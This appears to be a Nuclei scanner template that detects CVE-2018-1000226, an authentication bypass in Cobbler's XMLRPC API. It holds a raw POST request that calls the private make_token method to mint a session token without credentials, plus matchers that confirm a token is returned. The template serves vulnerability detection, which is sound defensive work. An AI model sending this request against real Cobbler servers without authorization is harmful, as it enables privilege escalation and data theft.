68 lines
2.0 KiB
YAML
68 lines
2.0 KiB
YAML
id: CVE-2018-1000226
|
|
|
|
info:
|
|
name: Cobbler - Authentication Bypass
|
|
author: c-sh0
|
|
severity: critical
|
|
description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
|
|
reference:
|
|
- https://github.com/cobbler/cobbler/issues/1916
|
|
- https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-1000226
|
|
cwe-id: CWE-732
|
|
epss-score: 0.01552
|
|
cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cobblerd
|
|
product: cobbler
|
|
tags: cve,cve2018,cobbler,auth-bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/xml
|
|
|
|
<?xml version='1.0'?>
|
|
<methodCall>
|
|
<methodName>_CobblerXMLRPCInterface__make_token</methodName>
|
|
<params>
|
|
<param>
|
|
<value>
|
|
<string>cobbler</string>
|
|
</value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "!contains(tolower(body), '<name>faultCode</name>')"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Type: text/xml"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<methodResponse>"
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "(.*[a-zA-Z0-9].+==)</string></value>"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|